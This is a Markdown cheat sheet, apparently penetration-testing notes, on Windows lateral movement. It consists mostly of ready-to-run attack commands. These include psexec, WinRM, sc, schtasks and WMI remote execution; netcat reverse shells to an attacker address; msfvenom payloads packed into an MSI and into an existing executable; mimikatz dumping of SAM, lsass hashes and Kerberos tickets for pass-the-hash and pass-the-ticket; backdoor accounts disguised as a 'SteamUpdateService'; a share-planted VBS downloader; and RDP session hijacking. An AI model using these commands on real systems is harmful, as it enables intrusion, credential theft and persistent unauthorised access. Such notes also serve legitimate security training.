# Lateral Movement * Finding credentials with more permissions move through the network cloaked, avoiding detection * Context of connections from A to B with permission C might be suspicious, therefore some bypass has to be found * Local and network/domain accounts have to be distinguished. UAC is enforced on local admin accounts and not on domain accounts * __Service executables need their own special reverse shell__, `msfvenom` file format `exe-service` ## Remote Processes ### psexec * Port `445` * `SMB` protocol * Group membership: `Administrators` * Upload the service binary to `ADMIN$` directory of the SMB server * Use `psexesvc.exe` via service control manager to execute the remote process * Communication will be established through a named pipe ```sh psexec64.exe \\%TARGET_IP% -u Administrator -p %PASSWORD% -i cmd.exe ``` ### WinRM * Ports `5985` (HTTP) and `5986` (HTTPS) * Group Membership: `Remote Management Users` * Execute powershell commands on remote targets ```sh winrs.exe -u:Administrator -p:%PASSWORD% -r:target cmd ``` * Run through powershell alternatively via ```sh $username = "Administrator"; $password = "SecurePassword"; $securePassword = ConvertTo-SecureString $password -AsPlainText -Force; $credential = New-Object System.Management.Automation.PSCredential $username, $securePassword; Enter-PSSession -Computername TARGET -Credential $credential Invoke-Command -Computername TARGET -Credential -ScriptBlock {whoami} ``` ### sc * Ports `135`, `49152-65535` (DCE/RPC), `135` shows service endpoints on the high ports * Ports `139` and `445`RPC over SMB named pipes, if SVCCTL fails over `135` * Group Membership: `Administrators` * Create service remotely via Service Control Manager (RPC) or `SVCCTL` ```sh sc.exe \\%TARGET_IP% create MyService binPath= "net user newuser securepassword /add" start= auto sc.exe \\%TARGET_IP% start MyService sc.exe \\%TARGET_IP% stop MyService sc.exe \\%TARGET_IP% delete MyService ``` ### schtasks * Create remote scheduled tasks ```sh schtasks /s TARGET /RU "SYSTEM" /create /tn "SteamUpdateService" /tr "" /sc ONCE /sd 01/01/1970 /st 00:00 schtasks /s TARGET /run /TN "SteamUpdateService" ``` * Delete scheduled tasks via ```sh schtasks /S TARGET /TN "SteamUpdateService" /DELETE /F ``` ### wmi * Ports are * DCOM `135` RPC and dynamic ports * Wsman `5985` winrm HTTP and `5986` winrm HTTPS * Group membership: `Administrators` * To start, use the same object used for winrm ```sh $username = "Administrator"; $password = "SecurePassword"; $securePassword = ConvertTo-SecureString $password -AsPlainText -Force; $credential = New-Object System.Management.Automation.PSCredential $username, $securePassword; ``` * Store the session ```sh $Opt = New-CimSessionOption -Protocol DCOM $Session = New-Cimsession -ComputerName TARGET -Credential $credential -SessionOption $Opt -ErrorAction Stop ``` * __Spawn a remote process__ ```sh $Command = "powershell.exe -Command Set-Content -Path C:\payload.txt -Value itworked"; Invoke-CimMethod -CimSession $Session -ClassName Win32_Process -MethodName Create -Arguments @{ CommandLine = $Command } ``` * Alternatively via ```sh wmic.exe /user:Administrator /password:securepassword /node:TARGET process call create "cmd.exe /c nc64.exe -e cmd.exe %ATTACKER_IP% %ATTACKER_PORT%" ``` * __Spawn a remote service__ ```sh Invoke-CimMethod -CimSession $Session -ClassName Win32_Service -MethodName Create -Arguments @{ Name = "SteamUpdateService"; DisplayName = "SteamUpdateService"; PathName = "net user gabenewell securepassword /add"; ServiceType = [byte]::Parse("16"); # Win32OwnProcess : Start service in a new process StartMode = "Manual" } ``` * Initiate the service ```sh $Service = Get-CimInstance -CimSession $Session -ClassName Win32_Service -filter "Name LIKE 'SteamUpdateService'" Invoke-CimMethod -InputObject $Service -MethodName StartService ``` * Start and stop via ```sh Invoke-CimMethod -InputObject $Service -MethodName StopService Invoke-CimMethod -InputObject $Service -MethodName Delete ``` * __Spawn a remote scheduled task__ ```sh $Command = "cmd.exe" $Args = "/c net user gabenewell securepassword /add" $Action = New-ScheduledTaskAction -CimSession $Session -Execute $Command -Argument $Args Register-ScheduledTask -CimSession $Session -Action $Action -User "NT AUTHORITY\SYSTEM" -TaskName "SteamUpdateService" Start-ScheduledTask -CimSession $Session -TaskName "SteamUpdateService" ``` * Delete task via ```sh Unregister-ScheduledTask -CimSession $Session -TaskName "SteamUpdateService" ``` * __ Install a remote msi package__ ```sh msfvenom -p windows/x64/shell_reverse_tcp LHOST=$TARGET_IP LPORT=4711 -f msi -o steam.msi ``` * Upload and run via ```sh Invoke-CimMethod -CimSession $Session -ClassName Win32_Product -MethodName Install -Arguments @{PackageLocation = "C:\Windows\steam.msi"; Options = ""; AllUsers = $false} ``` * Alternatively on older systems via ```sh wmic /node:TARGET /user:DOMAIN\USER product call install PackageLocation=c:\Windows\steam.msi ``` ## Further Authentication Methods * NTLM * Kerberos ### NTLM #### __Pass the hash__ * Retrieve and pass a hash generated from the password * Use mimikatz on local SAM ```sh privilege::debug token::elevate lsadump::sam ``` * Use mimikatz on lsass ```sh privilege::debug token::elevate sekurlsa::msv ``` * Open reverse shell via mimikatz ```sh token::revert sekurlsa::pth /user: /domain: /ntlm: /run:"C:\Windows\temp\nc.exe -e cmd.exe %ATTACKER_IP% 4711" ``` * Via RDP ```sh xfreerdp /v:$TARGET_IP /u:DOMAIN\\ /pth: ``` * Via psexec ```sh psexec.py -hashes DOMAIN/@%TARGET_IP% ``` * Kerberos ```sh evil-winrm -i $TARGET_IP -u -H ``` ### Kerberos * Ticket and session key are needed #### Pass The Ticket * Extract via mimikatz ```sh privilege::debug sekurlsa::tickets /export ``` * TGS need low privilege account, TGT need administrative privileges * Use the ticket to inject into a current session ```sh kerberos::ptt @.kirbi ``` * Check tickets via `klist` #### Overpass The Hash * Pass the key: Timestamp to gain TGT is encrypted via an encrypted key * Algorithms can be `rc4`, `aes128`, `aes256` or `des` if enabled * `rc4` is a pure ntml hash * Use the key to gain the TGT ```sh privilege::debug sekurlsa::ekeys ``` * Open a reverse shell via ```sh sekurlsa::pth /user:Administrator /domain: /: /run:"C:\Windows\Temp\nc.exe -e cmd.exe %ATTACKER_IP% 4711" ``` ## Writeable Shares * Find a shortcut, a script or anything that keeps a connection over the network to a share * Reuse a `*.vbs` via ```sh CreateObject("WScript.Shell").Run "cmd.exe /c copy /Y \\%TARGET_IP%\share\nc.exe %tmp% & %tmp%\nc.exe -e cmd.exe %ATTACKER_IP% 4711", 0, True ``` * Reuse and inject into exisiting portable executable ```sh msfvenom -a x64 --platform windows -x -k -p windows/meterpreter/reverse_tcp LHOST=$ATTACKER_IP LPORT=4711 -b "\x00" -f exe -o ``` * Reuse RDP session. Administrator can be logged out but did not close the session. Reuse it without a password as administrator user. Therefore run `cmd` or `powershell` as administrator and reuse the session by its name ```sh PsExec64.exe -s cmd.exe query user ``` * Check output and fill in ```sh tscon /dest: ``` * Session state should be `DISC`, a session which was not exited correctly * Windows Server < 2019 only without the password